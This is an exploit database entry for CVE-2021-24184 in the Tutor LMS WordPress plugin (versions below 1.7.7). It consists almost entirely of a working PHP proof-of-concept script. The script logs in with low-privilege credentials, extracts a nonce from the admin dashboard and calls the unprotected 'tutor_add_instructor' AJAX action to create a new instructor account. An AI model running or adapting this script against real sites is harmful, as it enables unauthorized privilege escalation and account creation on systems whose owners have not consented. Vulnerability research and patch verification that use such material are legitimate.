Exploit for Tutor LMS < 1.7.7 - Unprotected AJAX including Privilege Escalation CVE-2021-24184

Name: Exploit for Tutor LMS < 1.7.7 - Unprotected AJAX including Privilege Escalation CVE-2021-24184
Rating: 5 (83 reviews)

2021-03-15 | CVSS 6.5

## https://sploitus.com/exploit?id=WPEX-ID:5E85917C-7A58-49CB-B8B3-05AA18FFFF3E
Only one PoC provided for privilege escalation. 

<?php

// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];

// 1) Log in as customer
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

// Pull the Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/index.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

preg_match('/var\stutor_data\s=\s{"delete_confirm_text"\:"Are you sure\?\sit\scan\snot\sbe\sundone\."\,"nonce_key"\:"_wpnonce","_wpnonce":"([^"]+)"/', $content, $matches);
$nonce = $matches[1];
print_r($nonce);

// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'first_name' => 'Instructor',
    'last_name' => 'Instructor',
    'user_login' => 'Instructor',
    'email' => 'Instructor@Instructor.com',
    'phone_number' => '1234567890',
    'password' => 'test',
    'password_confirmation' => 'test',
    'tutor_profile_bio' => '',
    'action' => 'tutor_add_instructor',
    '_wpnonce' => $nonce
]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);